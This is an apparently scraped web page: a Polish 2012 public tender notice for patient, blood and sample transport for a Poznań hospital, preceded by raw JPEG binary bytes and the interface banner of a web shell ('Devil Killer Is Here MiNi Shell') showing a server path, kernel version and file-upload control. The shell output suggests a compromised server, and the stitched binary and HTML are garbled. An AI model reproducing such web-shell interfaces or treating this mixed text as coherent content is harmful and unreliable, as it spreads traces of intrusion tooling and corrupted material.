JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/76181-N-2012.html

<p class="kh_header"><b>Poznań: Świadczenie usług w zakresie transportu sanitarnego na rzecz Zakładu Opieki Zdrowotnej Poznań - Jeżyce - Szpitala im. Fr. Raszei w Poznaniu</b><br>
<b>Numer ogłoszenia: 76181 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Opieki Zdrowotnej Poznań-Jeżyce , ul. Mickiewicza 2, 60-834 Poznań, woj. wielkopolskie, tel. (061) 848 10 11, faks (061) 848 49 90/91.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.raszeja.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie transportu sanitarnego na rzecz Zakładu Opieki Zdrowotnej Poznań - Jeżyce - Szpitala im. Fr. Raszei w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie transportu sanitarnego na rzecz Zakładu Opieki Zdrowotnej Poznań - Jeżyce - Szpitala im. Fr. Raszei w Poznaniu.

Przedmiotem zamówienia jest świadczenie usług przewozowych w zakresie transportu sanitarnego pacjentów oraz transportu krwi, próbek, a także odbiór wyników badań na rzecz Zakładu Opieki Zdrowotnej Poznań - Jeżyce - Szpitala im. Fr. Raszei w Poznaniu - na warunkach szczegółowo przedstawionych w niżej opisanych pakietach (pakiet nr 1, pakiet nr 2 i pakiet nr 3).

Pakiet nr 1 - transport pacjentów na terenie miasta Poznania (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski)
Wymagany jest przewóz chorych w pozycji leżącej samochodem sanitarnym, spełniającym wymogi Sanepid-u. W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta z oddziału (pomoc przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego (mieszkanie, poradnia, inny szpital).
Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele i święta, przez całą dobę. Wykonawca winien stawić się w siedzibie Zamawiającego na każdorazowe telefoniczne wezwanie, najpóźniej w ciągu 15 minut, licząc od chwili wezwania. Zamawiający wymaga, aby Wykonawca posiadał sprawny technicznie samochód sanitarny, przeznaczony do przewozu chorych w pozycji leżącej, wyposażony w sygnalizację świetlno-dźwiękową dla pojazdów uprzywilejowanych, używaną na podstawie zezwolenia.
Zespół transportowy: kierowca + ratownik - szacunkowa liczba przewozów to 21 przewozów miesięcznie;
Zespół ratowniczy: 2 ratowników - szacunkowa liczba przewozów to 15 przewozów miesięcznie;
Zespół specjalistyczny lekarski: lekarz + 2 ratowników - szacunkowa liczba przewozów to 10 przewozów miesięcznie.

Pakiet nr 2 - transport pacjentów na terytorium Polski (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski)
Wymagany jest przewóz chorych w pozycji leżącej samochodem sanitarnym spełniającym wymogi Sanepid-u. W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta z oddziału (pomoc przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego (mieszkanie, poradnia, inny szpital). 
Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele i święta, przez całą dobę. Wykonawca winien stawić się w siedzibie Zamawiającego na każdorazowe telefoniczne wezwanie, najpóźniej w ciągu 60 minut, licząc od chwili wezwania.
Zamawiający wymaga, aby Wykonawca posiadał sprawny technicznie samochód sanitarny, przeznaczony do przewozu chorych w pozycji leżącej, wyposażony w sygnalizację świetlno-dźwiękową dla pojazdów uprzywilejowanych, używaną na podstawie zezwolenia.
Zespół transportowy: kierowca + ratownik - szacunkowa liczba kilometrów to 600 km miesięcznie;
Zespół ratowniczy: 2 ratowników - szacunkowa liczba kilometrów to 500 km miesięcznie;
Zespół specjalistyczny lekarski: lekarz + 2 ratowników - szacunkowa liczba kilometrów to 400 km miesięcznie.

Pakiet nr 3 - transport krwi i próbek oraz odbiór wyników badań na terenie miasta Poznania
Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele i święta, przez całą dobę. Wykonawca zapewni umiejscowienie krwi i próbek do badań 
w przenośnej lodówce. Wykonawca winien stawić się w siedzibie Zamawiającego na każdorazowe telefoniczne wezwanie, najpóźniej w ciągu 15 minut, licząc od chwili wezwania. Zamawiający wymaga, aby Wykonawca posiadał sprawny technicznie samochód sanitarny, przeznaczony do przewozu chorych w pozycji leżącej, wyposażony w sygnalizację świetlno-dźwiękową dla pojazdów uprzywilejowanych, używaną na podstawie zezwolenia.
Szacunkowa liczba przewozów to 28 przewozów miesięcznie.

UWAGA!!! Szacunkowe liczby przewozów oraz szacunkowe liczby kilometrów (dla pakietu nr 1, nr 2 i nr 3) zostały podane dla kalkulacji wartości oferty, mogą się one różnić w trakcie realizacji zamówienia. Zamawiający będzie realizował zamówienie według potrzeb.
Wykonawcy nie przysługuje roszczenie o domaganie się wykonania przewozów w ilości szacunkowej wyżej wskazanej ani też roszczenie o zapłatę wynagrodzenia za nie wykonane przewozy w sytuacji, gdy ilość wykonanych będzie niższa niż wynikająca z ilości szacunkowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania o udzielenie zamówienia publicznego Wykonawca nie jest zobowiązany zabezpieczyć składanej oferty wadium. W niniejszym postępowaniu wadium nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek sytuacji ekonomicznej i finansowej jeżeli wykaże, że posiada aktualną, opłaconą polisę ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 150.000,00 PLN.
W zakresie wykazania spełniania przez Wykonawcę przedmiotowego warunku, Wykonawca zobowiązany jest złożyć (wraz z ofertą):
- aktualną opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie Wykonawcy, że pracownicy Wykonawcy będą wyposażeni w jednolitą odzież ochronną (uniformy), wyróżniające ich tak, aby osoby postronne rozpoznawały w nich pracowników transportu sanitarnego.
2. Oświadczenie Wykonawcy, że pojazdy przeznaczone do realizacji zamówienia będą wyposażone zgodnie z opisem zawartym w SIWZ.
3. Kserokopie dowodów rejestracyjnych pojazdów przeznaczonych do realizacji zamówienia.
4. Kserokopie ważnych pozwoleń (oddzielnie dla każdego pojazdu) na używanie sygnałów dźwiękowych i świetlnych na podstawie art. 53 ust. 1 pkt 9 ustawy z dnia 20.06.1997 r. Prawo o ruchu drogowym oraz art. 104 Kodeksu postępowania administracyjnego.
5. Kserokopie ważnych polis ubezpieczenia od odpowiedzialności cywilnej i NW pojazdów przeznaczonych do realizacji zamówienia (oddzielnie dla każdego pojazdu).
6. Oświadczenie Wykonawcy, iż spełnia wszystkie wymagania stawiane przez Narodowy Fundusz Zdrowia oraz zobowiązanie się Wykonawcy do poddania się kontroli w zakresie dotyczącym umowy, która zostanie podpisana z Zamawiającym.
7. Oświadczenie Wykonawcy, iż wpisze informacje dotyczące umowy, która zostanie podpisana z Zamawiającym, na stronie Narodowego Funduszu Zdrowia w systemie SZOI.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się następujące dokumenty i załączniki:
1.1. Formularz oferty - wypełniony i podpisany przez Wykonawcę (Załącznik nr 1 do SIWZ).
1.2. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo zamówień publicznych (Załącznik nr 2 do SIWZ).
1.3. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Ustawy Prawo zamówień publicznych (Załącznik nr 3 do SIWZ).
1.4. Wzór umowy (Załącznik nr 4 do SIWZ).
1.5. Formularz oświadczenia I (Załącznik nr 5 do SIWZ).
1.6. Formularz oświadczenia II (Załącznik nr 6 do SIWZ).

2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Ustawy Prawo zamówień publicznych Wykonawca składa następujące dokumenty: 
2.1. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a przypadku osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 Ustawy.
2.2. Dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
2.3 Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Ustawy (Załącznik nr 3 do SIWZ).

3. W celu wykazania spełnienia przez Wykonawcę warunków o których mowa w art. 22 ust. 1 pkt 1 do 3 Ustawy Prawo zamówień publicznych, należy złożyć następujące dokumenty:
3.1. Aktualną opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
3.2. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy (Załącznik nr 2 do SIWZ).

4. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w Specyfikacji Istotnych Warunków Zamówienia do oferty należy dołączyć następujące dokumenty:  
4.1. Oświadczenie Wykonawcy, że pracownicy Wykonawcy będą wyposażeni w jednolitą odzież ochronną (uniformy), wyróżniające ich tak, aby osoby postronne rozpoznawały w nich pracowników transportu sanitarnego.
4.2. Oświadczenie Wykonawcy, że pojazdy przeznaczone do realizacji zamówienia będą wyposażone zgodnie z opisem zawartym w SIWZ.
4.3. Kserokopie dowodów rejestracyjnych pojazdów przeznaczonych do realizacji zamówienia.
4.4. Kserokopie ważnych pozwoleń (oddzielnie dla każdego pojazdu) na używanie sygnałów dźwiękowych i świetlnych na podstawie art. 53 ust. 1 pkt 9 ustawy z dnia 20.06.1997 r. Prawo o ruchu drogowym oraz art. 104 Kodeksu postępowania administracyjnego.
4.5. Kserokopie ważnych polis ubezpieczenia od odpowiedzialności cywilnej i NW pojazdów przeznaczonych do realizacji zamówienia (oddzielnie dla każdego pojazdu).
4.6. Oświadczenie Wykonawcy, iż spełnia wszystkie wymagania stawiane przez Narodowy Fundusz Zdrowia oraz zobowiązanie się Wykonawcy do poddania się kontroli w zakresie dotyczącym umowy, która zostanie podpisana z Zamawiającym.
4.7. Oświadczenie Wykonawcy, iż wpisze informacje dotyczące umowy, która zostanie podpisana z Zamawiającym, na stronie Narodowego Funduszu Zdrowia w systemie SZOI.

5. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: 
5.1. Zamiast dokumentów, o których mowa w pkt. 2.1. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt 5 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt 5. 

6. Dokumenty wymagane w przypadku składania oferty wspólnej:  
6.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
6.2. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt 1.3., 1.4. oraz 2 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.

7. Postanowienia dotyczące składanych dokumentów:
7.1. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w pkt 2 polega na zasobach innych podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów wymienionych w pkt od 2.1. do 2.2. dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia.
7.2. Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
7.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt. 7.1., kopie dokumentów dotyczących każdego z tych podmiotów winny być poświadczane za zgodność z oryginałem przez te podmioty.
7.4. Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela Wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego.
7.5. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
7.6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.raszeja.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, w Szpitalu im. Fr. Raszei w Poznaniu przy ul. Mickiewicza 2 (60-834 Poznań), w pokoju nr 361 (Zamówienia Publiczne) - III piętro Szpitala.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 09:00, miejsce: siedziba Zamawiającego, Szpital im. Fr. Raszei w Poznaniu przy ul. Mickiewicza 2 (60-834 Poznań), Kancelaria Szpitalna - piwnica Szpitala, wejście od ul. Poznańskiej.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
2. Zamawiający nie dopuszcza składania ofert równoważnych.
3. Termin realizacji zamówienia: - przez okres dwóch lat (24 miesięcy); przewidywany termin obowiązywania umowy od 04.05.2012 r. do 03.05.2014 r.
4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
5. Informacja na temat możliwości powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom: Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. UWAGA: Zamawiający, w zakresie pakietów nr 1 i nr 2 nie dopuszcza powierzenia wykonania zamówienia podwykonawcy.
6. Wymagania stawiane Wykonawcy: - Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. - Wymagana jest należyta staranność przy realizacji zobowiązań umowy, - Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. - Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
7. Rozliczenie pomiędzy stronami odbywać się będzie w złotych polskich. 
8. Zamawiający nie planuje zorganizowania zebrania Wykonawców.
9. Zamawiający nie planuje aukcji elektronicznej.
10. Zamawiający zastrzega sobie prawo wezwania Wykonawców do przedstawienia pojazdów przeznaczonych do realizacji zamówienia (celem sprawdzenia ich wyposażenia oraz stanu technicznego).
11. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - transport pacjentów na terenie miasta Poznania (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Transport pacjentów na terenie miasta Poznania (zespół transportowy, zespół ratowniczy lub zespół specjalistyczny lekarski).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
